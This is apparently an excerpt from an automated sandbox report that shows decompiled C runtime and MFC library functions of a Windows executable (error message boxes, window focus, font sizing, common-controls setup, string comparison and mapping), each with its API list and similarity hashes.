                                            						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                            					} else {
                                            						if(_t47 != 0xfc) {
                                            							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                            								E00409B00( &_v424, "<program name unknown>");
                                            							}
                                            							_push(_t48);
                                            							_t49 =  &_v424;
                                            							if(E00405A40( &_v424) + 1 > 0x3c) {
                                            								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
                                            								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
                                            								_t57 = _t57 + 0x10;
                                            							}
                                            							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
                                            							E00409B10( &_v164, _t49);
                                            							E00409B10( &_v164, "\n\n");
                                            							_t12 = _t54 + 0x43706c; // 0x42f53c
                                            							E00409B10( &_v164,  *_t12);
                                            							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                            						}
                                            					}
                                            				}
                                            				return _t17;
                                            			}














                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
                                            • GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
                                            • WriteFile.KERNEL32(00000000), ref: 00409A5B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: File$HandleModuleNameWrite
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
                                            • API String ID: 3784150691-1464146632
                                            • Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
                                            • Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
                                            • Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
                                            • Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				void* __ebp;
                                            				void* _t14;
                                            				void* _t17;
                                            				void* _t18;
                                            				void* _t28;
                                            				struct HWND__* _t29;
                                            				signed int _t33;
                                            				void* _t36;
                                            				void* _t40;
                                            				void* _t43;
                                            
                                            				_t28 = __ebx;
                                            				_push(__ecx);
                                            				_t36 = __ecx;
                                            				_t40 = E00414CEF(__ecx);
                                            				_t33 = _a4 & 0x0000fff0;
                                            				_t14 = _t33 - 0xf040;
                                            				if(_t14 == 0) {
                                            					L12:
                                            					if(_a8 != 0x75 || _t40 == 0) {
                                            						L15:
                                            						goto L16;
                                            					} else {
                                            						E004166F5(_t40);
                                            						L11:
                                            						_push(1);
                                            						_pop(0);
                                            						L16:
                                            						return 0;
                                            					}
                                            				}
                                            				_t17 = _t14 - 0x10;
                                            				if(_t17 == 0) {
                                            					goto L12;
                                            				}
                                            				_t18 = _t17 - 0x10;
                                            				if(_t18 == 0 || _t18 == 0xa0) {
                                            					if(_t33 == 0xf060 || _a8 != 0) {
                                            						if(_t40 != 0) {
                                            							_push(_t28);
                                            							_t29 =  *(_t36 + 0x1c);
                                            							_v8 = GetFocus();
                                            							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
                                            							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
                                            							if(IsWindow(_t29) != 0) {
                                            								SetActiveWindow(_t29);
                                            							}
                                            							if(IsWindow(_v8) != 0) {
                                            								SetFocus(_v8);
                                            							}
                                            						}
                                            					}
                                            					goto L11;
                                            				} else {
                                            					goto L15;
                                            				}
                                            			}















                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$ActiveFocus$MessageSend
                                            • String ID: u
                                            • API String ID: 1556911595-4067256894
                                            • Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
                                            • Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
                                            • Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
                                            • Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004170E7(intOrPtr __ecx, short _a4) {
                                            				intOrPtr _v8;
                                            				char _v40;
                                            				void _v68;
                                            				void* _t11;
                                            				signed int _t15;
                                            				int _t20;
                                            				char* _t24;
                                            				struct HDC__* _t26;
                                            
                                            				_v8 = __ecx;
                                            				_t20 = 0xa;
                                            				_t24 = "System";
                                            				_t11 = GetStockObject(0x11);
                                            				if(_t11 != 0) {
                                            					L2:
                                            					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
                                            						_t24 =  &_v40;
                                            						_t26 = GetDC(0);
                                            						_t15 = _v68;
                                            						if(_t15 < 0) {
                                            							_v68 =  ~_t15;
                                            						}
                                            						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
                                            						ReleaseDC(0, _t26);
                                            					}
                                            					L6:
                                            					if(_a4 == 0) {
                                            						_a4 = _t20;
                                            					}
                                            					return E00416FCD(_v8, _t24, _a4);
                                            				}
                                            				_t11 = GetStockObject(0xd);
                                            				if(_t11 == 0) {
                                            					goto L6;
                                            				}
                                            				goto L2;
                                            			}

                                            APIs
                                            • GetStockObject.GDI32(00000011), ref: 00417103
                                            • GetStockObject.GDI32(0000000D), ref: 0041710B
                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
                                            • GetDC.USER32(00000000), ref: 00417127
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
                                            • ReleaseDC.USER32 ref: 00417155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Object$Stock$CapsDeviceRelease
                                            • String ID: System
                                            • API String ID: 46613423-3470857405
                                            • Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
                                            • Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
                                            • Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
                                            • Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				intOrPtr* _t4;
                                            				intOrPtr* _t7;
                                            				_Unknown_base(*)()* _t11;
                                            				void* _t14;
                                            				struct HINSTANCE__* _t15;
                                            				void* _t17;
                                            
                                            				_t14 = 0;
                                            				_t17 =  *0x439fd0 - _t14; // 0x0
                                            				if(_t17 != 0) {
                                            					L4:
                                            					_t4 =  *0x439fd4; // 0x0
                                            					if(_t4 != 0) {
                                            						_t14 =  *_t4();
                                            						if(_t14 != 0) {
                                            							_t7 =  *0x439fd8; // 0x0
                                            							if(_t7 != 0) {
                                            								_t14 =  *_t7(_t14);
                                            							}
                                            						}
                                            					}
                                            					return  *0x439fd0(_t14, _a4, _a8, _a12);
                                            				}
                                            				_t15 = LoadLibraryA("user32.dll");
                                            				if(_t15 == 0) {
                                            					L10:
                                            					return 0;
                                            				}
                                            				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                            				 *0x439fd0 = _t11;
                                            				if(_t11 == 0) {
                                            					goto L10;
                                            				} else {
                                            					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
                                            					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
                                            					goto L4;
                                            				}
                                            			}

                                            APIs
                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                            • API String ID: 2238633743-4044615076
                                            • Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
                                            • Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
                                            • Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
                                            • Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004160E6(signed short _a4, signed int _a8) {
                                            				struct HINSTANCE__* _t6;
                                            				_Unknown_base(*)()* _t7;
                                            				struct HINSTANCE__* _t13;
                                            				struct HINSTANCE__* _t14;
                                            				CHAR* _t16;
                                            				signed short _t17;
                                            
                                            				_t16 = "COMCTL32.DLL";
                                            				_t14 = GetModuleHandleA(_t16);
                                            				_t6 = LoadLibraryA(_t16);
                                            				_t13 = _t6;
                                            				if(_t13 == 0) {
                                            					return _t6;
                                            				} else {
                                            					_t17 = 0;
                                            					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                            					if(_t7 != 0) {
                                            						_push(_a4);
                                            						if( *_t7() != 0) {
                                            							_t17 = _a4;
                                            							if(_t14 == 0) {
                                            								__imp__#17();
                                            								_t17 = _t17 | 0x00003fc0;
                                            							}
                                            						}
                                            					} else {
                                            						if((_a8 & 0x00003fc0) == _a8) {
                                            							__imp__#17();
                                            							_t17 = 0x3fc0;
                                            						}
                                            					}
                                            					FreeLibrary(_t13);
                                            					return _t17;
                                            				}
                                            			}

                                            APIs
                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
                                            • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
                                            • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                            • API String ID: 1437655972-4218389149
                                            • Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
                                            • Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
                                            • Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
                                            • Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				int _v32;
                                            				int _v36;
                                            				short* _v40;
                                            				short* _v44;
                                            				char _v58;
                                            				struct _cpinfo _v64;
                                            				void* _v80;
                                            				int _t65;
                                            				int _t66;
                                            				int _t69;
                                            				intOrPtr* _t82;
                                            				intOrPtr* _t84;
                                            				int _t86;
                                            				int _t87;
                                            				int _t88;
                                            				void* _t96;
                                            				char _t99;
                                            				char _t101;
                                            				intOrPtr _t104;
                                            				intOrPtr _t105;
                                            				int _t107;
                                            				short* _t109;
                                            				int _t111;
                                            				int _t114;
                                            				intOrPtr _t115;
                                            				short* _t116;
                                            				int _t118;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f6e8);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t115;
                                            				_t116 = _t115 - 0x30;
                                            				_v28 = _t116;
                                            				_t118 =  *0x43a068; // 0x0
                                            				_t107 = 1;
                                            				if(_t118 != 0) {
                                            					L5:
                                            					_t111 = _a16;
                                            					if(_t111 > 0) {
                                            						_t88 = E0040BFEE(_a12, _t111);
                                            						_pop(_t96);
                                            						_t111 = _t88;
                                            						_a16 = _t111;
                                            					}
                                            					if(_a24 > 0) {
                                            						_t87 = E0040BFEE(_a20, _a24);
                                            						_pop(_t96);
                                            						_a24 = _t87;
                                            					}
                                            					_t65 =  *0x43a068; // 0x0
                                            					if(_t65 != 2) {
                                            						if(_t65 != _t107) {
                                            							goto L48;
                                            						} else {
                                            							if(_a28 == 0) {
                                            								_t86 =  *0x439efc; // 0x0
                                            								_a28 = _t86;
                                            							}
                                            							if(_t111 == 0 || _a24 == 0) {
                                            								if(_t111 != _a24) {
                                            									if(_a24 <= _t107) {
                                            										if(_t111 > _t107) {
                                            											L30:
                                            											_push(3);
                                            											goto L18;
                                            										} else {
                                            											if(GetCPInfo(_a28,  &_v64) == 0) {
                                            												goto L48;
                                            											} else {
                                            												if(_t111 <= 0) {
                                            													if(_a24 <= 0) {
                                            														goto L39;
                                            													} else {
                                            														if(_v64 >= 2) {
                                            															_t82 =  &_v58;
                                            															if(_v58 != 0) {
                                            																while(1) {
                                            																	_t104 =  *((intOrPtr*)(_t82 + 1));
                                            																	if(_t104 == 0) {
                                            																		goto L20;
                                            																	}
                                            																	_t99 =  *_a20;
                                            																	if(_t99 <  *_t82 || _t99 > _t104) {
                                            																		_t82 = _t82 + 2;
                                            																		if( *_t82 != 0) {
                                            																			continue;
                                            																		} else {
                                            																			goto L20;
                                            																		}
                                            																	} else {
                                            																		goto L17;
                                            																	}
                                            																	goto L49;
                                            																}
                                            															}
                                            														}
                                            														goto L20;
                                            													}
                                            												} else {
                                            													if(_v64 >= 2) {
                                            														_t84 =  &_v58;
                                            														if(_v58 != 0) {
                                            															while(1) {
                                            																_t105 =  *((intOrPtr*)(_t84 + 1));
                                            																if(_t105 == 0) {
                                            																	goto L30;
                                            																}
                                            																_t101 =  *_a12;
                                            																if(_t101 <  *_t84 || _t101 > _t105) {
                                            																	_t84 = _t84 + 2;
                                            																	if( *_t84 != 0) {
                                            																		continue;
                                            																	} else {
                                            																		goto L30;
                                            																	}
                                            																} else {
                                            																	goto L17;
                                            																}
                                            																goto L50;
                                            															}
                                            														}
                                            													}
                                            													goto L30;
                                            													L50:
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										L20:
                                            										_t66 = _t107;
                                            									}
                                            								} else {
                                            									L17:
                                            									_push(2);
                                            									L18:
                                            									_pop(_t66);
                                            								}
                                            							} else {
                                            								L39:
                                            								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
                                            								_v32 = _t69;
                                            								if(_t69 == 0) {
                                            									goto L48;
                                            								} else {
                                            									_v8 = 0;
                                            									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
                                            									_v28 = _t116;
                                            									_v40 = _t116;
                                            									_v8 = _v8 | 0xffffffff;
                                            									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
                                            										goto L48;
                                            									} else {
                                            										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
                                            										_v36 = _t114;
                                            										if(_t114 == 0) {
                                            											goto L48;
                                            										} else {
                                            											_v8 = _t107;
                                            											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
                                            											_v28 = _t116;
                                            											_t109 = _t116;
                                            											_v44 = _t109;
                                            											_v8 = _v8 | 0xffffffff;
                                            											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
                                            												goto L48;
                                            											} else {
                                            												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
                                            					}
                                            				} else {
                                            					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
                                            						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
                                            							L48:
                                            							_t66 = 0;
                                            						} else {
                                            							 *0x43a068 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						 *0x43a068 = _t107;
                                            						goto L5;
                                            					}
                                            				}
                                            				L49:
                                            				 *[fs:0x0] = _v20;
                                            				return _t66;
                                            				goto L50;
                                            			}


                                            APIs
                                            • CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
                                            • CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
                                            • CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
                                            • GetCPInfo.KERNEL32(0000000B,00000000,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
                                            • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ByteCharCompareMultiStringWide$Info
                                            • String ID:
                                            • API String ID: 1651298574-0
                                            • Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
                                            • Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
                                            • Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
                                            • Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				int _v32;
                                            				short* _v36;
                                            				short* _v40;
                                            				int _v44;
                                            				void* _v60;
                                            				int _t61;
                                            				int _t62;
                                            				int _t82;
                                            				int _t83;
                                            				int _t88;
                                            				short* _t89;
                                            				int _t90;
                                            				void* _t91;
                                            				int _t99;
                                            				intOrPtr _t101;
                                            				short* _t102;
                                            				int _t104;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f5d0);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t101;
                                            				_t102 = _t101 - 0x1c;
                                            				_v28 = _t102;
                                            				_t104 =  *0x439ee0; // 0x1
                                            				if(_t104 != 0) {
                                            					L5:
                                            					if(_a16 > 0) {
                                            						_t83 = E0040BFEE(_a12, _a16);
                                            						_pop(_t91);
                                            						_a16 = _t83;
                                            					}
                                            					_t61 =  *0x439ee0; // 0x1
                                            					if(_t61 != 2) {
                                            						if(_t61 != 1) {
                                            							goto L21;
                                            						} else {
                                            							if(_a28 == 0) {
                                            								_t82 =  *0x439efc; // 0x0
                                            								_a28 = _t82;
                                            							}
                                            							asm("sbb eax, eax");
                                            							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                                            							_v32 = _t88;
                                            							if(_t88 == 0) {
                                            								goto L21;
                                            							} else {
                                            								_v8 = 0;
                                            								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                                            								_v28 = _t102;
                                            								_v40 = _t102;
                                            								_v8 = _v8 | 0xffffffff;
                                            								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                                            									goto L21;
                                            								} else {
                                            									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                                            									_v44 = _t99;
                                            									if(_t99 == 0) {
                                            										goto L21;
                                            									} else {
                                            										if((_a9 & 0x00000004) == 0) {
                                            											_v8 = 1;
                                            											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                                            											_v28 = _t102;
                                            											_t89 = _t102;
                                            											_v36 = _t89;
                                            											_v8 = _v8 | 0xffffffff;
                                            											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                                            												goto L21;
                                            											} else {
                                            												_push(0);
                                            												_push(0);
                                            												if(_a24 != 0) {
                                            													_push(_a24);
                                            													_push(_a20);
                                            												} else {
                                            													_push(0);
                                            													_push(0);
                                            												}
                                            												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                                            												if(_t99 == 0) {
                                            													goto L21;
                                            												} else {
                                            													goto L30;
                                            												}
                                            											}
                                            										} else {
                                            											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                                            												L30:
                                            												_t62 = _t99;
                                            											} else {
                                            												goto L21;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                            					}
                                            				} else {
                                            					_push(0);
                                            					_push(0);
                                            					_t90 = 1;
                                            					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
                                            						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
                                            							L21:
                                            							_t62 = 0;
                                            						} else {
                                            							 *0x439ee0 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						 *0x439ee0 = _t90;
                                            						goto L5;
                                            					}
                                            				}
                                            				 *[fs:0x0] = _v20;
                                            				return _t62;
                                            			}


                                            APIs
                                            • LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
                                            • LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
                                            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
                                            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: String$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 352835431-0
                                            • Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
                                            • Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
                                            • Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
                                            • Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
